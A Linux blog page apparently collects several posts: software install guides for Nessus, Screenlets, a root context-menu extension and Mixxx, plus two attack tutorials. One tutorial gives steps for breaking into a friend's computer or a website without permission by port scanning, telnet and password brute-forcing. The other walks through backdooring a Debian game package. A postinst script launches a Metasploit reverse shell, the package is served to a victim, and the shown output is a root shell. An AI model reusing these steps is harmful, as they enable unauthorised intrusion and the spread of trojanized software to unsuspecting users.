Showing posts with label Linux. Show all posts
Showing posts with label Linux. Show all posts

Sunday, 5 April 2015

How to install Nessus Vulnerability Scanner in Ubuntu


Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture for easy cross-linking between compliant security tools.

Click here to Download Nessus for Ubuntu


Posted by at 1 comment:
Labels: , , , ,

Saturday, 4 April 2015

How to install screenlets in ubuntu/linux


Screenlets are small owner-drawn applications (written in Python) that can be described as "the virtual representation of things lying/standing around on your desk". Sticky notes, clocks, rulers, ... the possibilities are endless.
The goal of the Screenlets base-classes is to simplify the creation of fully themable mini-apps that each solve basic desktop-work-related needs and generally improve the usability and eye-candy of the modern composited Linux-desktop.
Features:
  • Real applications, no HTML-"widgets"
  • Easy to use, easy to develop
  • Full compositing support
  • Works with any composited X desktop (compiz, xfce4, ...)
  • Works also on non-composited desktop
  • Included ability to apply themes (SVG, PNG or mixed)
  • Fully scalable when using SVGs
  • Embedded drag&drop-support
  • Automated storing of options (using ini or GConf)
  • Controllable through customizable D-Bus service
  • Can be used together with compiz' widget-plugin to create a Dashboard-like feature as seen on OS X
  • Uses Cairo and GTK2 for drawing and windowing

VIDEO TUTORIAL : 


How to run screenlets as root in ubuntu/linux

Posted by at No comments:
Labels: , , ,

Thursday, 20 June 2013

Add Open As Administrator to the Context Menu in Ubuntu

586x550xopen_admin_precise_thumb.png.pagespeed.ic.ZddcIcalqm

Add Open As Administrator to the Context Menu in Ubuntu :

When this feature is enabled, you should be able to right-click any file or folder in nautilus and open it as an administrator or root. This will come in handy especially for new users who want to edit or modify files or folders owned by the root user or administrator.

To get started, press Ctrl – Alt – T on your keyboard to open Terminal. When it opens, run the commands below to download it.


  • wget http://www.liberiangeek.net/blog/tools/libnautilus-gksu.so




Next, copy the file to the folder shown below


  • sudo cp libnautilus-gksu.so /usr/lib/nautilus/extensions-3.0/




Restart your computer and enjoy!

VIDEO :
Posted by at No comments:
Labels: , , ,

Wednesday, 19 June 2013

Hack remote computer via IP and open ports



ip


Hack remote computer :


hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.



You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.


Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.



1. Confirm the website or a computer you want to hack.
2. Find or trace their IP address.
3. Make sure that IP address is online
4. Scan for open ports
5. Check for venerable ports

6. Access through the port
7. Brute-force username and password

Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.

For example,
ping www.google.com



will fetch the IP address of Google.com


This is how we can get the IP address of the victims website.

How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.

One of the widely used method to detect IP address of your friend is by chatting with him.

You might find this article helpful

How to get the IP address using MSN/Yahoo/Pidgin messenger


Now you got the IP address right? Is it online?

To know the online status just ping the IP address, if it is online it will reply.


If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.


Use Advanced Port Scanner to scan all open and venerable ports.



Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.

Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.


telnet [IP address] [Port]



You’ll be asked to input login information.


If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one: Brutus, THC Hydra...
- THC Hydra
In this way you’ll able to hack remove computer using only IP address

Posted by at No comments:
Labels: , , , , ,

Thursday, 30 May 2013

Binary Linux Trojan

Linux_Trojan

Binary Linux Trojan

Binary Linux Trojan is  not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux. An excellent video was made by Redmeat_uk demonstrating this technique that you can view at http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Mine Sweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#


Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN


In the 'DEBIAN' directory, create a file named 'control' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN', we'll create a file named 'postinst' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443


We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.
root@kali:/tmp/evil# service apache2 start


We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb


As the victim installs and plays our game, we have received a shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)



Posted by at No comments:
Labels: , , , ,

Wednesday, 29 May 2013

Mixxx – The most advanced free DJ software For ubuntu

Mixxx-1.11.0-

 

free DJ software For ubuntu

Mixxx is a free DJ software For ubuntu that allows for the playback and mixing of digital music (MP3, Ogg Vorbis, FLAC and Wave).The basic requirements for Mixxx are a desktop computer or laptop with a reasonable amount of storage space on the hard drive for your music, at least 1 audio card for outputting the sound and a way of controlling the software either by mouse, keyboard or hardware DJ Controller.

Mixxx will run on the Linux, Mac OS X and Windows operating systems

Mixxx Features

  • Cross-platform (Windows XP/Vista/7/8, Mac OS X, Linux)

  • Free and open source (GPL v2)

  • Parallel or split scratchable waveform displays

  • Waveform summaries

  • Spinning vinyl widgets

  • MP3, OGG, WAVE, M4A / AAC, and FLAC playback

  • Extra playback formats through plugins

  • Fast, database-powered library

  • Shoutcast and Icecast broadcasting

  • Microphone Support

  • Automatic crossfading with Auto DJ

  • Crates and playlists

  • Reads iTunes, Traktor, and Rhythmbox libraries

  • Pitch-independent time stretch (key lock)

  • Vinyl emulation

  • Quantized loops, hot cues, and beatloops

  • Synchronization and auto-beatmatching

  • 4 Sampler Decks

  • Wave and Ogg recording with optional MP3 support.

  • BPM detection and estimation

  • Bulk BPM analysis

  • Multichannel soundcard support (playback and capture)

  • Headphone cueing with multiple soundcard support

  • Adjustable EQ shelves

  • Crossfader curve control

  • Skinnable interface with 5 pixel-perfect skins bundled

  • Advanced MIDI scripting engine

  • Multiple simultaneous MIDI controllers

  • Adjustable pitch range

  • Ramping pitchbend controls

  • Multi-core CPU support

  • 24-bit/96000 Hz playback and capture

  • Crystal clear audio

  • Hardware video acceleration


Install Mixxx in ubuntu 13.04/12.10/12.04

Open the terminal and run the following commands
sudo add-apt-repository ppa:mixxx/mixxx
sudo apt-get update
sudo apt-get install mixxx libportaudio2


Posted by at No comments:
Labels: , , , , ,
Subscribe to: Comments (Atom)